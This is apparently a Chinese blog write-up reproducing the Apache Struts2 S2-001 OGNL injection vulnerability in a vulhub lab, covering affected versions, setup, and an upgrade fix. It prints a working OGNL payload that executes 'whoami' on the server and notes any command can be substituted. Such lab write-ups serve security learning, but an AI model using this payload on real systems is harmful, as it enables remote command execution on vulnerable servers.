Apache Struts2漏洞复现之s2-001漏洞复现

0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。

缘起于Apache Struts的WebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。

0x03 漏洞概述:

该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。

0x04 影响版本:

Struts 2.0.0 - 2.0.8

0x05 环境搭建:

Docker环境搭建:

参考这篇文章(https://blog.csdn.net/qq_44281295/article/details/126573488)

漏洞环境搭建:

下载vulhub

https://github.com/vulhub/vulhub

启动项目

进入s2-001目录

cd /root/vulhub/struts2/s2-001/

注意!!

有可能下载不了,需要科学上网!!

访问:

0x06 漏洞复现:

利用POC:

复制代码
%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

执行任意命令时只需要,将上面poc里whoami的命令替换为其他即可。

0x07 流量分析:

可以从流量中明显看出恶意命令信息。

0x08 修复建议:

从 XWork 2.0.4 开始,OGNL 解析已更改,其不会递归解析,所以可以更新 Struts 版本或 XWork 版本为漏洞修复版本。

相关推荐
Nelson_hehe22 分钟前
Java基础第四章、面向对象
java·语法基础·面向对象程序设计
Thomas_YXQ28 分钟前
Unity3D Lua集成技术指南
java·开发语言·驱动开发·junit·全文检索·lua·unity3d
ShiinaMashirol1 小时前
代码随想录打卡|Day27(合并区间、单调递增的数字、监控二叉树)
java·算法
迷路的小绅士3 小时前
防火墙技术深度解析:从包过滤到云原生防火墙的部署与实战
网络安全·云原生·防火墙技术·包过滤防火墙·状态检测防火墙
东阳马生架构3 小时前
Nacos简介—3.Nacos的配置简介
java
北极的企鹅883 小时前
XML内容解析成实体类
xml·java·开发语言
oioihoii3 小时前
C++23 中 static_assert 和 if constexpr 的窄化布尔转换
java·jvm·c++23
聂 可 以3 小时前
调整IntelliJ IDEA当前文件所在目录(包路径)的显示位置
java·ide·intellij-idea
东阳马生架构3 小时前
Sentinel源码—7.参数限流和注解的实现一
java·sentinel
李白的粉3 小时前
基于springboot的在线教育系统
java·spring boot·毕业设计·课程设计·在线教育系统·源代码